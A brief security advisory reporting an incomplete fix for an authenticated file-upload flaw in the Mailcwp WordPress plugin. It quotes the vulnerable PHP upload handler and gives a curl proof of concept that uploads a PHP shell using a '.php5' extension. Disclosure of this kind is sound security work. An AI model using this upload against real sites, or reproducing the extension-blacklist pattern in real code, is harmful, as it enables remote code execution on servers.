Title:Mailcwp remote file upload vulnerability incomplete fix v1.100
I noticed CVE-2015-1000000 wasn't fixed correctly, _any_ authenticated user can upload a file to the WordPress installation, they can get .php code execution by changing the extension to .php[3-5], .pht or .phtml.

My previous advisory:

http://www.vapidlabs.com/advisory.php?v=138


require_once "../../../wp-load.php";

if (!is_user_logged_in()) {
  die('{"ERROR": -1}');
}

$message_id = $_REQUEST["message_id"];
$upload_dir = $_REQUEST["upload_dir"];
if (empty($_FILES) || $_FILES["file"]["error"]) {
  die('{"OK": 0}');
}
 
$fileName = $_FILES["file"]["name"];
$ext = pathinfo($fileName, PATHINFO_EXTENSION);
if ($ext == 'php') {
  die('{"ERROR": -2}');
}
move_uploaded_file($_FILES["file"]["tmp_name"], "$upload_dir/$message_id-$fileName");
 
die('{"OK": 1}');Create any type of user and copy the contents of your cookie file for curl:

$ curl   -F "file=@/home/larry/shell.php5" "http://example.com/wp-content/plugins/mailcwp/mailcwp-upload.php?message_id=1" -F "upload_dir=/usr/share/wordpress/wp-content/uploads" --cookie cookie.txt 
{"OK": 1}